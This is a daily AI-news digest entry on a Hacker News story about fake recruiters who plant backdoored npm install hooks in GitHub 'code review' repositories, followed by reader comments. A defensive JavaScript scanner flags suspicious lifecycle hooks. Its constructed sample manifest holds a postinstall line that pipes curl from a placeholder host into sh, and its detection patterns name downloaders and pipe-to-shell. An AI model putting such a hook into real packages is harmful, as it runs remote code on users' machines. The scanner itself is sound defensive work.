AMAZINGINDEX.COM Daily AI Briefing
VOL. 2026.06 · 2026.06.16
Daily Snapshot · NO. 015

Recruitment trap: a GitHub repository hiding a backdoor

#ARTICLE HackerNews 2026.06.16
Recommendation score 54.0 · NO. 015 · 2026.06.16
Published 2026/06/15 · Score 101 · Comments 19

Attackers pose as LinkedIn recruiters and send targets a GitHub repository containing a malicious backdoor, using a "code review" task as the pretext to get them to clone and run it. This is a new style of social-engineering attack aimed at developers; AI engineers handle external code all the time and are prime targets.


What makes this attack cunning is that it exploits the trust chain of everyday developer work: code review is a normal process, and GitHub is a trusted platform. The attackers deliberately chose "deprecated Node modules" as the entry point, because npm install is a common situation in which scripts run automatically, and developers almost never audit dependency install scripts line by line.

This is especially dangerous for AI engineers: you routinely clone open-source model weights, evaluation tools and fine-tuning scripts, and are used to running pip install or npm install right away. Make it a habit: open all external code in an isolated container or cloud sandbox first, inspect package.json and its install hooks, and run a reverse background check on any "recruiter" who contacts you unprompted.
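One way to do the package.json check described above, as an added example that is not from the digest or the HN thread: it lists the npm lifecycle hooks that run on their own during an install and flags shell-like patterns in them. The manifest it scans is constructed for illustration.

```javascript
// Added example: audit a package.json for npm lifecycle hooks that run
// automatically during `npm install`. The manifest below is constructed.

// Script names npm executes on its own during an install of the package.
const AUTO_RUN_HOOKS = [
  "preinstall", "install", "postinstall",
  "preprepare", "prepare", "postprepare", "prepublish",
];

// Patterns worth a manual read before any hook is allowed to run.
const SUSPICIOUS = [
  ["downloader", /\b(curl|wget)\b/i],
  ["pipe-to-shell", /\|\s*(ba|z)?sh\b/i],
  ["base64", /base64/i],
  ["eval", /\beval\s*\(/i],
  ["inline-node", /\bnode\s+-e\b/i],
  ["remote-url", /https?:\/\//i],
];

// Returns one finding per auto-run hook present in the manifest.
function auditManifest(manifestText) {
  const scripts = JSON.parse(manifestText).scripts || {};
  const findings = [];
  for (const hook of AUTO_RUN_HOOKS) {
    if (typeof scripts[hook] !== "string") continue;
    const command = scripts[hook];
    const hits = SUSPICIOUS
      .filter(([, re]) => re.test(command))
      .map(([label]) => label);
    findings.push({ hook, command, suspicious: hits.length > 0, hits });
  }
  return findings;
}

// Constructed sample: a "deprecated" module whose postinstall fetches and runs
// a remote script; prepare is a plain local build step.
const SAMPLE_MANIFEST = JSON.stringify({
  name: "legacy-widget",
  version: "0.9.1",
  scripts: {
    test: "mocha",
    postinstall: "node -e \"require('child_process').execSync('curl -s https://example.invalid/s | sh')\"",
    prepare: "node scripts/build.js",
  },
});

for (const f of auditManifest(SAMPLE_MANIFEST)) {
  console.log(`${f.suspicious ? "REVIEW" : "ok    "} ${f.hook}: ${f.command}`, f.hits);
}
```

The scan only covers the top-level manifest, so for a real clone pair it with `npm install --ignore-scripts` (or `ignore-scripts=true` in .npmrc), which also disables hooks in transitive dependencies.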

Negative · 21 comments

Core debate: developers underestimate the risk of executing external code, and social-engineering attacks that exploit job-search anxiety are hard to defend against.

theoeiffijr

Maybe Mac will finally get a decent virtualization framework. Downloading random unprotected scripts from the internet like it is 1995 is getting old pretty fast. Remember to use protection when meeting random people and putting their junk deep inside your computer!

rvz

Or running random curl | bash scripts from GitHub, AUR, NPM is just as bad, but many developers here still have dubious assumptions about this bad practice. The last few weeks tell us how bad this is, especially with all the mini-Shai-Huluds running around.

CyanLite2

Isn't this how most NPM authors are hacked these days? I think the axios guy got hit with the same approach over LinkedIn.
